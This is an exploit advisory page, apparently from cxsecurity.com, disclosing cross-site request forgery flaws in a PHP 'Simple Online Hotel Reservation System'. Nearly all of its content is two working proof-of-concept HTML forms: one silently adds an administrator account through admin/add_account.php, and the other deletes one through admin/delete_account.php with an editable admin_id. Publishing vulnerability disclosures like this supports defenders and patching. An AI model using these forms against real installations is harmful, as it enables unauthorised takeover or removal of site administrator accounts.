Simple Online Hotel Reservation System Cross Site Request Forgery

2019-03-01 / 2019-02-28
Credit: Mr Winst0n
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-352

# Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Add Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Add Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/add_account.php"> <label>Name </label> <input type = "text" name = "name" /><br><br> <label>Username </label> <input type = "text" name = "username" /><br><br> <label>Password </label> <input type = "password" name = "password" /><br><br> <button name = "add_account">Saved</button> </div> </form> </body> </html> # Exploit Title: Simple Online Hotel Reservation System - Cross-Site Request Forgery (Delete Admin) # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: February 25, 2019 # Vendor Homepage: https://code-projects.org/ # Software Link : https://code-projects.org/simple-online-hotel-reservation-system-in-php-with-source-code/ # Tested on: Kali linux, Windows 8.1 # PoC: <html> <head> <title>Delete Admin</title> </head> <body> <form method = "POST" action="http://localhost/[PATH]/admin/delete_account.php?admin_id=1"> <!-- You can change admin_id --> <button>Delete</button> </form> </body> </html>


Vote for this issue:
50%
50%

Comment it here.

Copyright 2025, cxsecurity.com

 

Back to Top